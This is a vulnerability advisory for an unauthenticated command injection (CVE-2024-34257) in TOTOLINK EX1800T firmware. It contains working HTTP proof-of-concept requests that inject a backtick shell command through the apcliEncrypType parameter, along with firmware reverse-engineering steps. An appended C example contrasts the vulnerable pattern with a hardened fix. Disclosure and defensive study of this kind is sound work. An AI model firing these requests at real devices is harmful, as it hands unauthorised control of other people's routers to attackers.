TOTOLINK EX1800T unauthenticated arbitrary command execution vulnerability (CVE-2024-34257)

1. Vulnerability description

The TOTOLINK EX1800T wireless extender, firmware version V9.1.0cu.2112_B20220316, has a command injection vulnerability in the apcliEncrypType parameter handled by cstecgi.cgi (topicurl setWiFiExtenderConfig). The parameter value is embedded in a shell command without any validation or authentication check, so an unauthenticated attacker on the network can execute arbitrary commands on the device and obtain administrator-level control of it.

2. Vulnerability reproduction

Equipment: TOTOLINK EX1800T

Firmware version: V9.1.0cu.2112_B20220316

Manufacturer website: https://www.totolink.net/

Firmware download: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/223/ids/36.html

Assigned CVE ID: CVE-2024-34257

Exploit POC:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 127.0.0.1
Content-Length: 116
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset:utf-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/page/index.html?timestamp=1714114057910
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
"token":"",
"apcliEncrypType":"`id>../test.txt`",
"topicurl":"setWiFiExtenderConfig"
}
```

The token field is left empty, so no session is needed. The backtick-enclosed `id>../test.txt` is evaluated by the shell when the CGI builds its command; because cstecgi.cgi runs from /cgi-bin/, the relative path ../test.txt places the output in the web root, where it can be fetched directly.

Retrieve the command output:

```http
GET /test.txt HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

3. Vulnerability analysis

Extract the firmware file system with binwalk:

```shell
binwalk -Me TOTOLINK_C8341E_EX1800T_WX032_MT7621MT7915_SPI_16M128M_V9.1.0cu.2112_B20220316_ALL_Easymesh.web
```

Use grep to locate the binaries that reference the vulnerable parameter name:

```shell
grep -rl apcliEncrypType
```

Load cstecgi.cgi into IDA for reverse analysis. Following the references to the apcliEncrypType string leads to LOAD:00408434, where the parameter value is placed in $a1 and passed into sub_403600:

Inside sub_403600, the value ends up in the variable v7, which is formatted into a command string and passed to the CsteSystem function, a system()-style wrapper that runs the string through the shell. Because the attacker-controlled apcliEncrypType value reaches this format string without being validated, shell metacharacters in the parameter (such as the backticks in the POC) are interpreted and the embedded command is executed.
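The following C is an added illustration of the pattern described in this analysis, not code from the TOTOLINK firmware or from the page. It places the vulnerable construction (formatting an attacker-controlled value into a command string that a shell then parses) beside a hardened version that validates the value against a fixed allowlist and executes the helper with execv, so the argument is never reparsed by a shell. The command template `iwpriv apcli0 set EncrypType=%s`, the allowed-value list, and the use of /bin/echo as a stand-in for the real configuration tool are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CMD_MAX 256

/* Vulnerable pattern (illustrative): the parameter value is interpolated into a
 * command string that is later handed to a system()-style wrapper. The shell
 * evaluates backticks, $(...), ';', '|' etc. inside the value. The command
 * template here is an assumption; the real one is not shown on the page. */
int build_apcli_cmd_vulnerable(char *out, size_t out_len, const char *enc_type)
{
    int n = snprintf(out, out_len, "iwpriv apcli0 set EncrypType=%s", enc_type);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Hardened, step 1: an encryption type is an enumerable setting, so accept only
 * known tokens. This list is an assumption for the example. */
static const char *const ALLOWED_ENC_TYPES[] = { "NONE", "WEP", "TKIP", "AES", "TKIPAES" };

int apcli_enc_type_allowed(const char *enc_type)
{
    if (enc_type == NULL)
        return 0;
    for (size_t i = 0; i < sizeof ALLOWED_ENC_TYPES / sizeof ALLOWED_ENC_TYPES[0]; i++)
        if (strcmp(enc_type, ALLOWED_ENC_TYPES[i]) == 0)
            return 1;
    return 0;
}

/* Hardened, step 2 (defense in depth, useful for parameters that cannot be
 * enumerated): reject any value carrying shell metacharacters or whitespace. */
int has_shell_metachar(const char *s)
{
    static const char meta[] = "`$|;&<>()\n\r\\\"' \t";
    return s != NULL && strpbrk(s, meta) != NULL;
}

/* Hardened setter: validate, then run the helper via fork/execv with the value
 * as a discrete argv element. No shell is involved, so even a value that slipped
 * past validation could not be reinterpreted as a command. /bin/echo stands in
 * for the real configuration tool. Returns the child's exit status, or -1. */
int set_apcli_enc_type_safe(const char *enc_type)
{
    if (!apcli_enc_type_allowed(enc_type) || has_shell_metachar(enc_type))
        return -1;

    char arg[64];
    snprintf(arg, sizeof arg, "EncrypType=%s", enc_type);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { "/bin/echo", "apcli0", "set", arg, NULL };
        execv(argv[0], argv);
        _exit(127); /* only reached if execv fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: the exact value used in the POC above. */
    const char *payload = "`id>../test.txt`";
    char cmd[CMD_MAX];

    build_apcli_cmd_vulnerable(cmd, sizeof cmd, payload);
    printf("vulnerable command string : %s\n", cmd);
    printf("hardened setter (payload) : %d\n", set_apcli_enc_type_safe(payload));
    printf("hardened setter (\"AES\")   : %d\n", set_apcli_enc_type_safe("AES"));
    return 0;
}
```

Run as-is, the first line shows the backticks surviving intact into the command string, which is exactly what the shell behind CsteSystem would evaluate; the hardened setter rejects the payload (-1) and runs the legitimate value through execv (exit status 0).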